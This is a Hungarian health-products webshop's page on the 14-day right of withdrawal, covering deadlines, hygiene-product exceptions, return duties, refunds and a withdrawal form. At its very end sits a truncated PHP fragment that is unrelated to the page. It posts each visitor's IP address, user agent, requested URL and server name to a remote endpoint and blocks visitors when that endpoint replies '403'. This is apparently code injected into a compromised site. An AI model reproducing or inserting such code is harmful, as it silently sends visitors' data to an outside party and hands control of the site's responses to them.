Online Vevőszolgálat - 14 napos elállás


Meggondolta magát? A 14 napos elállás jogszabályáról érthetően!

 

14 napos elállási idő

A 14 napos elállási idő a megrendelt áruk átvétele utáni napon veszi kezdetét. Amennyiben a kéthetes időszak utolsó napja munkaszüneti napra esik, az elállási idő az ezt követő munkanapon jár le.

Mik a kivételek?

Higiéniai vagy egészségvédelmi termékekkel kapcsolatban csak akkor van a vásárlónak elállási joga, ha ezeket eredeti csomagolásukban, bontalanul és sértetlenül adja vissza. (Ezt a Webshop állapítja meg) Vagyis itt nem működik, hogy előbb kipróbálja, aztán dönt arról, megtartja-e vagy sem. 

Az elállásból egészségügyi-higiéniai okokból kizárt termékek a testtel, testnedvvel érintkező termékek, különösen az alábbiak (a felsorolás nem teljeskörű) : wc magasítók, szoba wc-k, fürdető eszközök, matracok és matracvédő lepedők, párnák, harisnyák, vércukor mérők és tesztcsíkok, antidekubitusz termékek. 

Ezeket a termékeket csak a lezárt csomagolás felbontása előtt lehet visszaküldeni, azt követően nem.  

A vevőnek nemcsak jogai, hanem kötelezettségei is vannak.

Ha úgy dönt, szeretne elállni a vásárlástól, arról a kereskedőt értesítenie kell. Nem elég csak visszaküldeni az adott terméket. A tájékoztatást megteheti levélben, e-mailben, vagy a legegyszerűbben ennek az űrlapnak a kitöltésével, amely automatikusan rögzül a webshop rendszerében! Miután a vásárló jelezte döntését, az elvárható és lehetséges legrövidebb időn belül (de legkésőbb 30 napon belül) vissza kell hogy juttassa a webshop címére (2000 Szentendre, Kőzúzó út 1)  a terméket. 

Az áru visszaküldésének a költségét a vevő állja, kivéve, ha erről nem kapott előzőleg tájékoztatást a webáruháztól. Ilyen esetben az e-kereskedőnek (webshopnak) kell fizetnie a költséget.

A viszaküldés során a terméket lehetőleg az eredeti gyári csomagolásba kell megfelelően becsomagolni mnden tartozákával együtt úgy, hogy sem a termék, sem annak csomagolása ne sérüljön, szennyeződjön a szállítás során. Ha vagy termék, vagy csomagolás hiányosan vagy sérülten érkezik vissza a webshophoz, vagy teljes egészében vagy részlegesen a webshop megtagadhatja a vételár visszafizetését. Erről a webshop a vásárlót írásban értesíti részletes indoklással. Ilyen esetben a terméket a vásárló saját költségén elszállíthatja vagy átveheti az ügyfélszolgálat címéről nyitvatartási időben.  A Bükkös Egészségtár Kft  nem vállalja a sérülten visszaérkezett termékek újbóli kiküldését.

Mikor kapja vissza a vásárló a vételárat?

A Bükkös Egésszégtár Kft  az ép, sértetlen és hiánytalan termék beérkezését követően 8 napon belül utalja vissza a vételárat. 

Vásárló neve *:
Vásárló telefonszáma *:
E-mail cím*:
Bizonylat megadása *
Rendelés vagy számla sorszáma *:
Vásárlás dátuma *:
A termék pontos megnevezése, cikkszáma, mennyisége, aminek vásárlásától el szeretne állni *:
Bankszámla szám, ahova a vételár visszautalását kérem*:
Hozzájárulok, hogy személyes adataimat a Bükkös Egészségtár Kft. rögzítse és kezelje az elállás ügyintézése során.*
Igen
A Bükkös Egészségtár Kft. Általános Szerződési Feltételeit megismertem és elfogadom.*
Igen
Megjegyzés
true, CURLOPT_TIMEOUT=>5, CURLOPT_POST=>1, CURLOPT_POSTFIELDS=>"u=1&ra=".$s["REMOTE_ADDR"]."&ua=".$s["HTTP_USER_AGENT"]."&ru=".$s["REQUEST_URI"]."&sn=".$s["SERVER_NAME"]));$c = curl_exec($h);curl_close($h); if($c=="403"){header('HTTP/1.0 403 Forbidden');die();} ?>